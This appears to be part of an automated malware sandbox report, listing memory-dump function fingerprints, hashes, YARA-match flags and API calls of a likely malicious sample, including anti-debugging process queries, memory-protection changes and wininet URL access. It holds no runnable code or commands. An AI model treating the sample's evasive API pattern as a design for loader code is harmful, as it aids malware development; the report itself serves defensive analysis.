                  • Opcode Fuzzy Hash: fd01225522cb96142988643e802517d5df111cc3aa413f62ea7e0871550a8928
                  • Instruction Fuzzy Hash: B4316231660706CFDB15CEB8C88679473E1AF57328F5D46E9CA118B165E3BE9190CB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 4a784aefbd5b9b3f2930d8c32229f56cdbe7f11837a84c9f416592b52c9b6516
                  • Instruction ID: 7258950092286aed04e12617bbae4604af6d91111bd3d2e59549bdf83e5f3bb6
                  • Opcode Fuzzy Hash: 4a784aefbd5b9b3f2930d8c32229f56cdbe7f11837a84c9f416592b52c9b6516
                  • Instruction Fuzzy Hash: 7F316231660706CFDB15CEB8C88679473E1AB57328F5D46E8C6148B165E3BE9190CBC2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 0d0c8f65bf891c8fcbd3996fee12b23a3503c7ecbed04ca7d79e48c7b1fd8d93
                  • Instruction ID: 46137204ea060816d814e57e70091f19b39f698f6a9bb7d52ca787c444642d85
                  • Opcode Fuzzy Hash: 0d0c8f65bf891c8fcbd3996fee12b23a3503c7ecbed04ca7d79e48c7b1fd8d93
                  • Instruction Fuzzy Hash: 5621D83063470A8FEB16DE68C448764B6D3ABA7334F5942B9CA1186599E37884C4CB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: ddc394d03b7476133eb28d92618c5d5ae68da9ab92806b681dcd77b1aa95948d
                  • Instruction ID: 3db3f169acdb0737a7efdf6cbf58824ca922f90a2d88e7c810196b9200484f1b
                  • Opcode Fuzzy Hash: ddc394d03b7476133eb28d92618c5d5ae68da9ab92806b681dcd77b1aa95948d
                  • Instruction Fuzzy Hash: D9214131620706CFDB15CEA8C84579477E2AB57328F5D52E9C6248B165E3BE91D0CBC2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 0ad5ad5cec1718c47752366c3548aa653e9789a477296b49e535d0f13f7361be
                  • Instruction ID: 7d11fea50d3f581210be2040d6d9ac0d27c39ccd9c257a5d52edcb989892e120
                  • Opcode Fuzzy Hash: 0ad5ad5cec1718c47752366c3548aa653e9789a477296b49e535d0f13f7361be
                  • Instruction Fuzzy Hash: 60213031660706CFDB15CEB8C88679073E1AB57328F5D46E9C5208B165F3BE9190CB83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 41542db823fda1b047a6b4eacd225efcc20e81e67d05b5cdf1c934babbc6b040
                  • Instruction ID: fc52db586d03128509c3d8870093323f7dbd797ea48d6441b60876a55a9ce3c4
                  • Opcode Fuzzy Hash: 41542db823fda1b047a6b4eacd225efcc20e81e67d05b5cdf1c934babbc6b040
                  • Instruction Fuzzy Hash: EA11EF31660706CFDB25CEA8C88679077E2AB53328F5D45E9C6508B165E3BE91D4CB83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01215045,00000040,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012153BF
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0121417D: LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  • LdrInitializeThunk.NTDLL ref: 01213398
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeLibraryLoadThunk
                  • String ID: $W$0={,$wininet.dll
                  • API String ID: 3353482560-3341375924
                  • Opcode ID: 98de3d1fceb00725b6c213d1fd9391c9bb809f99096fdfeffc681eada0398f39
                  • Instruction ID: dbbfbea0007fe8d84c983b6b9eb9c6473028a7383120ba5a637f45f45eb1bfb8
                  • Opcode Fuzzy Hash: 98de3d1fceb00725b6c213d1fd9391c9bb809f99096fdfeffc681eada0398f39
                  • Instruction Fuzzy Hash: 0EE107B165024ADFEB20EF24CC81BE93BE2BF74344F648118FE495B298C7B49491CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 1FFE6BB0
                  • GetCurrentThread.KERNEL32 ref: 1FFE6BED
                  • GetCurrentProcess.KERNEL32 ref: 1FFE6C2A
                  • GetCurrentThreadId.KERNEL32 ref: 1FFE6C83
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: e807e2d41fce7a0c482854efb18f733554ba8757c2b6ebc6e4bf16a699b7badb
                  • Instruction ID: 2fa818350b56a95f4603428ba7cc7ecb860ab272adf30112dcd3ca8280352a85
                  • Opcode Fuzzy Hash: e807e2d41fce7a0c482854efb18f733554ba8757c2b6ebc6e4bf16a699b7badb
                  • Instruction Fuzzy Hash: C95125B0D046498FEB14CFA9C988BDEBBF1FF49315F208459E019A7360D7B96880CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: wininet.dll
                  • API String ID: 2994545307-3354682871
                  • Opcode ID: d2c0e53003341bd516599b97f96a327b9d86af7a5e39f8d9e4e22f0c723b79f4
                  • Instruction ID: 27389ed43cb021ac7b9c41be6f6950a91fb860642447ad591362501fb3195681
                  • Opcode Fuzzy Hash: d2c0e53003341bd516599b97f96a327b9d86af7a5e39f8d9e4e22f0c723b79f4
                  • Instruction Fuzzy Hash: DAD0A73005D2C985C311F354017AA637B915B70234BFEC18E84C10662F8E405656E3CE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1FFE52A2
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1FFE52A2
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 1FFE7CF9
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CallProcWindow
                  • String ID:
                  • API String ID: 2714655100-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.475060551.00000000201A0000.00000040.00000001.sdmp, Offset: 201A0000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.475060551.00000000201A0000.00000040.00000001.sdmp, Offset: 201A0000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 01211A9D
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: TerminateThread
                  • String ID:
                  • API String ID: 1852365436-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01212DD7
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InternetOpen
                  • String ID:
                  • API String ID: 2038078732-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FFE6DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FFE6DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 01211A9D
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: TerminateThread
                  • String ID:
                  • API String ID: 1852365436-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlEncodePointer.NTDLL(00000000), ref: 1FFEBE72
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlEncodePointer.NTDLL(00000000), ref: 1FFEBE72
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,012129A2,01212A19), ref: 012129E6
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.474155472.000000001DC4D000.00000040.00000001.sdmp, Offset: 1DC4D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.474155472.000000001DC4D000.00000040.00000001.sdmp, Offset: 1DC4D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadMemoryProtectVirtual
                  • String ID:
                  • API String ID: 3389902171-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadMemoryProtectVirtual
                  • String ID:
                  • API String ID: 3389902171-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%